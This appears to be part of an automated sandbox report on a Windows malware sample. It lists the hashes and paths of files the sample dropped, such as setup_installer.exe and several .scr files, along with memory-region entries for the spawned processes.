ab770ced694c8b9c0dc142d3855eb892
SHA18b9cd45bc8d2b6b2a3ef13c480023a1df08c9879
SHA256d603d8bb0d36a84145011620bd6dfc1f985ad60d75e2ca8f3a921eaa60932093
SHA51209180f2c7060f4f65def4ddaed8fc5495c110cd57f1abbacb7b7c7126dfd774a3df36793f9c5ce551b55c57a9ce1924c89742dc8eabd3e494663a1887a5a3f9e
-
C:\Users\Admin\AppData\Local\Temp\is-DGFPF.tmp\___YHDG34.exeMD5
ab770ced694c8b9c0dc142d3855eb892
SHA18b9cd45bc8d2b6b2a3ef13c480023a1df08c9879
SHA256d603d8bb0d36a84145011620bd6dfc1f985ad60d75e2ca8f3a921eaa60932093
SHA51209180f2c7060f4f65def4ddaed8fc5495c110cd57f1abbacb7b7c7126dfd774a3df36793f9c5ce551b55c57a9ce1924c89742dc8eabd3e494663a1887a5a3f9e
-
C:\Users\Admin\AppData\Local\Temp\is-DGFPF.tmp\idp.dllMD5
8f995688085bced38ba7795f60a5e1d3
SHA15b1ad67a149c05c50d6e388527af5c8a0af4343a
SHA256203d7b61eac96de865ab3b586160e72c78d93ab5532b13d50ef27174126fd006
SHA512043d41947ab69fc9297dcb5ad238acc2c35250d1172869945ed1a56894c10f93855f0210cbca41ceee9efb55fd56a35a4ec03c77e252409edc64bfb5fb821c35
-
C:\Users\Admin\AppData\Local\Temp\setup.exeMD5
234fad127f21b6119124e83d9612dc75
SHA101de838b449239a5ea356c692f1f36cd0e3a27fd
SHA25632668075f8c859636cb19de60d5ddc6e4fa1bfbc94eb6504636946d641110876
SHA51241618ad70dc6296200471ce85be320502425730b84cb3b92f9295725746c024593811c61addc4c15c1a3d51227e50e159bc09c8d75b6029476c5b8afaacba002
-
C:\Users\Admin\AppData\Local\Temp\setup.exeMD5
234fad127f21b6119124e83d9612dc75
SHA101de838b449239a5ea356c692f1f36cd0e3a27fd
SHA25632668075f8c859636cb19de60d5ddc6e4fa1bfbc94eb6504636946d641110876
SHA51241618ad70dc6296200471ce85be320502425730b84cb3b92f9295725746c024593811c61addc4c15c1a3d51227e50e159bc09c8d75b6029476c5b8afaacba002
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exeMD5
ba006f1773c915924ac591d1d0be5f93
SHA1a2c813e0fb3931ce4cdbcc0550e7251eac0c462d
SHA256b1487e330fa196d897d0afc4f06540f8c94af8cfcb49d86e49673577b0d3869c
SHA512a38fa78807f193d935b81829fb714e3b87a32c3dadfe37c5e7780fcfd23d53028088f9a4f0bb2a0ac1a633e224de8fa992ee30d2d50cd58033b7edd4e5567255
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exeMD5
ba006f1773c915924ac591d1d0be5f93
SHA1a2c813e0fb3931ce4cdbcc0550e7251eac0c462d
SHA256b1487e330fa196d897d0afc4f06540f8c94af8cfcb49d86e49673577b0d3869c
SHA512a38fa78807f193d935b81829fb714e3b87a32c3dadfe37c5e7780fcfd23d53028088f9a4f0bb2a0ac1a633e224de8fa992ee30d2d50cd58033b7edd4e5567255
-
C:\Users\Admin\AppData\Local\Temp\tmpD07F_tmp.exeMD5
5d270754f01dc386e2fd92d17b712089
SHA154f3dfbd240c1d386b5dcdf40c992fbe5ec6c54a
SHA256e82b6a388c857c85725c43648a57f6ba037f961f7786a721a1bbdade6e86dda3
SHA512113e1fa970cfa8ac3d4c97e7c3cfdc09aa6031e24666fbf819702e652ef610cfc7b900aca30bf2810c388c8ab77978394c0344f16395957bea406de1ae1c72cb
-
C:\Users\Admin\AppData\Local\Temp\tmpD07F_tmp.exeMD5
5d270754f01dc386e2fd92d17b712089
SHA154f3dfbd240c1d386b5dcdf40c992fbe5ec6c54a
SHA256e82b6a388c857c85725c43648a57f6ba037f961f7786a721a1bbdade6e86dda3
SHA512113e1fa970cfa8ac3d4c97e7c3cfdc09aa6031e24666fbf819702e652ef610cfc7b900aca30bf2810c388c8ab77978394c0344f16395957bea406de1ae1c72cb
-
C:\Users\Admin\AppData\Roaming\4765798.scrMD5
30bf59a608ca803952ee548dbc7f48e6
SHA1a8cb76c3140a52949ed5738059fc45930c18f1da
SHA2565b8025f0b1e6f060ecc1f4cb89c94fc682c5eb4873fd447457c30aaef109d5e1
SHA512d4ab4d976582dc8248b116b7a2e38dc0a265bc3f9ac8ad455e9a7a1a45bf195632b517785fd517900c517ba5e660c93aff036b404466579260e041fa3bfb9c7c
-
C:\Users\Admin\AppData\Roaming\4765798.scrMD5
30bf59a608ca803952ee548dbc7f48e6
SHA1a8cb76c3140a52949ed5738059fc45930c18f1da
SHA2565b8025f0b1e6f060ecc1f4cb89c94fc682c5eb4873fd447457c30aaef109d5e1
SHA512d4ab4d976582dc8248b116b7a2e38dc0a265bc3f9ac8ad455e9a7a1a45bf195632b517785fd517900c517ba5e660c93aff036b404466579260e041fa3bfb9c7c
-
C:\Users\Admin\AppData\Roaming\6947549.scrMD5
93f66806138e73bd5e175360d5391a60
SHA122a78f3678bc0cea6ad8de5f5815c7d4fc6f5d00
SHA256320e8c2cd2579032e02db72f7f9c2862cba54982e91f5f03c1a0360d99e068ef
SHA51229da14820edfe88844aa1c06b1090d5399e5785f742909210eddd7518d941d44e35df36cde246dcbfe7eb86dfe729f3bb61197a6589ddd503d07396257ea618c
-
C:\Users\Admin\Documents\uGAIOsy0cyBMLy0x8qQhbIb9.exeMD5
3f22bd82ee1b38f439e6354c60126d6d
SHA163b57d818f86ea64ebc8566faeb0c977839defde
SHA256265c2ddc8a21e6fa8dfaa38ef0e77df8a2e98273a1abfb575aef93c0cc8ee96a
SHA512b73e8e17e5e99d0e9edfb690ece8b0c15befb4d48b1c4f2fe77c5e3daf01df35858c06e1403a8636f86363708b80123d12122cb821a86b575b184227c760988f
-
C:\Users\Admin\Documents\uGAIOsy0cyBMLy0x8qQhbIb9.exeMD5
3f22bd82ee1b38f439e6354c60126d6d
SHA163b57d818f86ea64ebc8566faeb0c977839defde
SHA256265c2ddc8a21e6fa8dfaa38ef0e77df8a2e98273a1abfb575aef93c0cc8ee96a
SHA512b73e8e17e5e99d0e9edfb690ece8b0c15befb4d48b1c4f2fe77c5e3daf01df35858c06e1403a8636f86363708b80123d12122cb821a86b575b184227c760988f
-
memory/552-494-0x0000000000710000-0x0000000000719000-memory.dmpFilesize
36KB
-
memory/552-385-0x0000000000000000-mapping.dmp
-
memory/668-184-0x0000000000000000-mapping.dmp
-
memory/724-531-0x0000000000400000-0x0000000000408000-memory.dmpFilesize
32KB
-
memory/876-192-0x0000000000000000-mapping.dmp
-
memory/1064-245-0x00000000032E0000-0x00000000032E1000-memory.dmpFilesize
4KB
-
memory/1064-193-0x0000000000000000-mapping.dmp
-
memory/1064-250-0x00000000059B0000-0x00000000059B1000-memory.dmpFilesize
4KB
-
memory/1064-226-0x0000000000E40000-0x0000000000E41000-memory.dmpFilesize
4KB
-
memory/1064-234-0x00000000057B0000-0x00000000057B1000-memory.dmpFilesize
4KB
-
memory/1180-233-0x0000000140000000-0x0000000140650000-memory.dmpFilesize
6.3MB
-
memory/1180-197-0x0000000000000000-mapping.dmp
-
memory/1212-427-0x000000007EE60000-0x000000007EE61000-memory.dmpFilesize
4KB
-
memory/1212-237-0x0000000004960000-0x0000000004961000-memory.dmpFilesize
4KB
-
memory/1212-315-0x00000000079B0000-0x00000000079B1000-memory.dmpFilesize
4KB
-
memory/1212-243-0x0000000004962000-0x0000000004963000-memory.dmpFilesize
4KB
-
memory/1212-256-0x0000000006FB0000-0x0000000006FB1000-memory.dmpFilesize
4KB
-
memory/1212-260-0x0000000007920000-0x0000000007921000-memory.dmpFilesize
4KB
-
memory/1212-265-0x0000000007A00000-0x0000000007A01000-memory.dmpFilesize
4KB
-
memory/1212-251-0x0000000006F30000-0x0000000006F31000-memory.dmpFilesize
4KB
-
memory/1212-322-0x0000000007FF0000-0x0000000007FF1000-memory.dmpFilesize
4KB
-
memory/1212-235-0x0000000006FF0000-0x0000000006FF1000-memory.dmpFilesize
4KB
-
memory/1212-249-0x0000000007620000-0x0000000007621000-memory.dmpFilesize
4KB
-
memory/1212-286-0x0000000007EC0000-0x0000000007EC1000-memory.dmpFilesize
4KB
-
memory/1212-230-0x00000000043B0000-0x00000000043B1000-memory.dmpFilesize
4KB
-
memory/1212-356-0x0000000004965000-0x0000000004967000-memory.dmpFilesize
8KB
-
memory/1212-196-0x0000000000000000-mapping.dmp
-
memory/1212-273-0x0000000007A70000-0x0000000007A71000-memory.dmpFilesize
4KB
-
memory/1248-195-0x0000000000000000-mapping.dmp
-
memory/1652-199-0x0000000000000000-mapping.dmp
-
memory/1652-264-0x0000000000620000-0x0000000000629000-memory.dmpFilesize
36KB
-
memory/1900-601-0x0000000001800000-0x0000000001802000-memory.dmpFilesize
8KB
-
memory/3196-549-0x0000000002A30000-0x0000000002A45000-memory.dmpFilesize
84KB
-
memory/3232-190-0x0000000000000000-mapping.dmp
-
memory/3576-146-0x0000000000000000-mapping.dmp
-
memory/3772-182-0x0000000000000000-mapping.dmp
-
memory/3872-270-0x000002A8BBAE2000-0x000002A8BBAE4000-memory.dmpFilesize
8KB
-
memory/3872-289-0x000002A8BBAE5000-0x000002A8BBAE7000-memory.dmpFilesize
8KB
-
memory/3872-241-0x000002A8BBAE0000-0x000002A8BBAE2000-memory.dmpFilesize
8KB
-
memory/3872-236-0x000002A8BBA50000-0x000002A8BBA5B000-memory.dmpFilesize
44KB
-
memory/3872-284-0x000002A8BBAE4000-0x000002A8BBAE5000-memory.dmpFilesize
4KB
-
memory/3872-253-0x000002A8D8870000-0x000002A8D88EE000-memory.dmpFilesize
504KB
-
memory/3872-218-0x000002A8BB510000-0x000002A8BB511000-memory.dmpFilesize
4KB
-
memory/3872-203-0x0000000000000000-mapping.dmp
-
memory/3964-628-0x000000001B1A0000-0x000000001B1A2000-memory.dmpFilesize
8KB
-
memory/4128-541-0x0000000000690000-0x00000000006C0000-memory.dmpFilesize
192KB
-
memory/4128-379-0x0000000000000000-mapping.dmp
-
memory/4260-383-0x0000000000000000-mapping.dmp
-
memory/4264-216-0x0000000000810000-0x0000000000811000-memory.dmpFilesize
4KB
-
memory/4264-208-0x0000000000000000-mapping.dmp
-
memory/4264-258-0x00000000059E0000-0x00000000059E1000-memory.dmpFilesize
4KB
-
memory/4264-252-0x0000000005420000-0x0000000005421000-memory.dmpFilesize
4KB
-
memory/4356-176-0x0000000000000000-mapping.dmp
-
memory/4360-423-0x0000000004DF0000-0x0000000005396000-memory.dmpFilesize
5.6MB
-
memory/4360-368-0x0000000000000000-mapping.dmp
-
memory/4460-188-0x0000000000000000-mapping.dmp
-
memory/4512-213-0x0000000000000000-mapping.dmp
-
memory/4512-291-0x0000000003D50000-0x0000000003E90000-memory.dmpFilesize
1.2MB
-
memory/4528-248-0x0000000002870000-0x0000000002871000-memory.dmpFilesize
4KB
-
memory/4528-231-0x0000000000000000-mapping.dmp
-
memory/4528-244-0x00000000008E0000-0x00000000008E1000-memory.dmpFilesize
4KB
-
memory/4528-261-0x000000001B560000-0x000000001B562000-memory.dmpFilesize
8KB
-
memory/4544-599-0x0000000000AF0000-0x0000000000AF2000-memory.dmpFilesize
8KB
-
memory/4552-440-0x000000001B1E0000-0x000000001B1E2000-memory.dmpFilesize
8KB
-
memory/4604-367-0x0000000000000000-mapping.dmp
-
memory/4604-446-0x0000000004D30000-0x0000000005348000-memory.dmpFilesize
6.1MB
-
memory/4612-171-0x0000000000000000-mapping.dmp
-
memory/4636-167-0x0000000000000000-mapping.dmp
-
memory/4704-222-0x0000000000000000-mapping.dmp
-
memory/4704-242-0x0000000002100000-0x0000000002101000-memory.dmpFilesize
4KB
-
memory/4724-170-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/4724-169-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/4724-172-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/4724-168-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/4724-166-0x000000006B280000-0x000000006B2A6000-memory.dmpFilesize
152KB
-
memory/4724-165-0x000000006FE40000-0x000000006FFC6000-memory.dmpFilesize
1.5MB
-
memory/4724-164-0x000000006B440000-0x000000006B4CF000-memory.dmpFilesize
572KB
-
memory/4724-149-0x0000000000000000-mapping.dmp
-
memory/4848-454-0x00000000024B0000-0x0000000002540000-memory.dmpFilesize
576KB
-
memory/4848-363-0x0000000000000000-mapping.dmp
-
memory/4868-174-0x0000000000000000-mapping.dmp
-
memory/4916-178-0x0000000000000000-mapping.dmp
-
memory/4960-229-0x0000000000C80000-0x0000000000C81000-memory.dmpFilesize
4KB
-
memory/4960-214-0x0000000000000000-mapping.dmp
-
memory/4968-217-0x0000000000000000-mapping.dmp
-
memory/4988-212-0x0000000000400000-0x000000000046D000-memory.dmpFilesize
436KB
-
memory/4988-201-0x0000000000000000-mapping.dmp
-
memory/5036-328-0x0000000000000000-mapping.dmp
-
memory/5052-186-0x0000000000000000-mapping.dmp
-
memory/5056-180-0x0000000000000000-mapping.dmp
-
memory/5100-198-0x0000000000000000-mapping.dmp
-
memory/5100-255-0x0000000000760000-0x00000000007A8000-memory.dmpFilesize
288KB
-
memory/5104-380-0x0000000000000000-mapping.dmp
-
memory/5104-522-0x0000000005850000-0x0000000005851000-memory.dmpFilesize
4KB
-
memory/5152-375-0x0000000000000000-mapping.dmp
-
memory/5164-377-0x0000000000000000-mapping.dmp
-
memory/5164-500-0x0000000005BB0000-0x0000000005BB1000-memory.dmpFilesize
4KB
-
memory/5292-353-0x0000000000000000-mapping.dmp
-
memory/5292-472-0x0000000003000000-0x000000000391E000-memory.dmpFilesize
9.1MB
-
memory/5348-360-0x0000000000000000-mapping.dmp
-
memory/5348-419-0x0000000005860000-0x0000000005E78000-memory.dmpFilesize
6.1MB
-
memory/5404-395-0x0000000003400000-0x0000000003402000-memory.dmpFilesize
8KB
-
memory/5404-254-0x0000000000000000-mapping.dmp
-
memory/5404-266-0x0000000000C80000-0x0000000000C81000-memory.dmpFilesize
4KB
-
memory/5432-271-0x0000000000B70000-0x0000000000B72000-memory.dmpFilesize
8KB
-
memory/5432-257-0x0000000000000000-mapping.dmp
-
memory/5532-343-0x0000000000000000-mapping.dmp
-
memory/5532-413-0x0000000005D20000-0x0000000005D21000-memory.dmpFilesize
4KB
-
memory/5536-302-0x0000000000400000-0x0000000000422000-memory.dmpFilesize
136KB
-
memory/5536-330-0x00000000059D0000-0x00000000059D1000-memory.dmpFilesize
4KB
-
memory/5536-300-0x0000000000000000-mapping.dmp
-
memory/5536-348-0x0000000005770000-0x0000000005D88000-memory.dmpFilesize
6.1MB
-
memory/5536-326-0x00000000058C0000-0x00000000058C1000-memory.dmpFilesize
4KB
-
memory/5556-349-0x0000000004E30000-0x0000000005448000-memory.dmpFilesize
6.1MB
-
memory/5556-323-0x0000000004EF0000-0x0000000004EF1000-memory.dmpFilesize
4KB
-
memory/5556-303-0x0000000000400000-0x0000000000422000-memory.dmpFilesize
136KB
-
memory/5556-301-0x0000000000000000-mapping.dmp
-
memory/5556-317-0x0000000005450000-0x0000000005451000-memory.dmpFilesize
4KB
-
memory/5616-292-0x000000001B130000-0x000000001B132000-memory.dmpFilesize
8KB
-
memory/5616-277-0x0000000000470000-0x0000000000471000-memory.dmpFilesize
4KB
-
memory/5616-272-0x0000000000000000-mapping.dmp
-
memory/5692-603-0x0000000000A70000-0x0000000000A72000-memory.dmpFilesize
8KB
-
memory/5696-276-0x0000000000000000-mapping.dmp
-
memory/5696-296-0x000000001AF00000-0x000000001AF02000-memory.dmpFilesize
8KB
-
memory/5696-281-0x00000000002C0000-0x00000000002C1000-memory.dmpFilesize
4KB
-
memory/5736-386-0x0000000000000000-mapping.dmp
-
memory/5756-544-0x00000000009C0000-0x00000000009F0000-memory.dmpFilesize
192KB
-
memory/5756-369-0x0000000000000000-mapping.dmp
-
memory/5796-365-0x0000000000000000-mapping.dmp
-
memory/5796-505-0x0000000000940000-0x00000000009CE000-memory.dmpFilesize
568KB
-
memory/5800-347-0x0000000004890000-0x00000000048BF000-memory.dmpFilesize
188KB
-
memory/5800-283-0x0000000000000000-mapping.dmp
-
memory/5820-451-0x0000000002D80000-0x0000000002DAF000-memory.dmpFilesize
188KB
-
memory/5820-364-0x0000000000000000-mapping.dmp
-
memory/5848-370-0x0000000000000000-mapping.dmp
-
memory/5856-512-0x0000000005620000-0x0000000005621000-memory.dmpFilesize
4KB
-
memory/5856-374-0x0000000000000000-mapping.dmp
-
memory/5880-371-0x0000000000000000-mapping.dmp
-
memory/5888-290-0x0000000000000000-mapping.dmp
-
memory/5888-295-0x0000000000770000-0x0000000000771000-memory.dmpFilesize
4KB
-
memory/5888-311-0x00000000050D0000-0x0000000005356000-memory.dmpFilesize
2.5MB
-
memory/5904-526-0x00000000038F0000-0x00000000038F1000-memory.dmpFilesize
4KB
-
memory/5904-366-0x0000000000000000-mapping.dmp
-
memory/5920-376-0x0000000000000000-mapping.dmp
-
memory/5936-470-0x0000000005A80000-0x0000000005A81000-memory.dmpFilesize
4KB
-
memory/5936-355-0x0000000000000000-mapping.dmp
-
memory/5944-381-0x0000000000000000-mapping.dmp
-
memory/5944-443-0x00000000023E0000-0x00000000024B4000-memory.dmpFilesize
848KB
-
memory/5992-516-0x0000000005760000-0x0000000005761000-memory.dmpFilesize
4KB
-
memory/5992-378-0x0000000000000000-mapping.dmp
-
memory/6040-361-0x0000000000000000-mapping.dmp
-
memory/6060-350-0x0000000004B90000-0x0000000004B91000-memory.dmpFilesize
4KB
-
memory/6060-327-0x00000000000B0000-0x00000000000B1000-memory.dmpFilesize
4KB
-
memory/6060-304-0x0000000000000000-mapping.dmp
-
memory/6116-319-0x0000000000F10000-0x0000000000F11000-memory.dmpFilesize
4KB
-
memory/6116-345-0x0000000001820000-0x0000000001822000-memory.dmpFilesize
8KB
-
memory/6116-331-0x00000000016E0000-0x00000000016E1000-memory.dmpFilesize
4KB
-
memory/6116-310-0x0000000000000000-mapping.dmp
-
memory/6216-582-0x0000000004E30000-0x0000000004EE9000-memory.dmpFilesize
740KB
-
memory/6216-583-0x0000000005350000-0x0000000005409000-memory.dmpFilesize
740KB
-
memory/6216-580-0x00000000031D0000-0x00000000031D1000-memory.dmpFilesize
4KB
-
memory/6268-539-0x000000001AC20000-0x000000001AC22000-memory.dmpFilesize
8KB
-
memory/6592-655-0x0000000000400000-0x000000000046D000-memory.dmpFilesize
436KB
-
memory/6692-598-0x00000000021A0000-0x00000000021A1000-memory.dmpFilesize
4KB
-
memory/6728-596-0x0000000000400000-0x0000000000416000-memory.dmpFilesize
88KB
-
memory/6776-581-0x0000000005610000-0x0000000005611000-memory.dmpFilesize
4KB
-
memory/6828-559-0x0000000003F80000-0x00000000040C0000-memory.dmpFilesize
1.2MB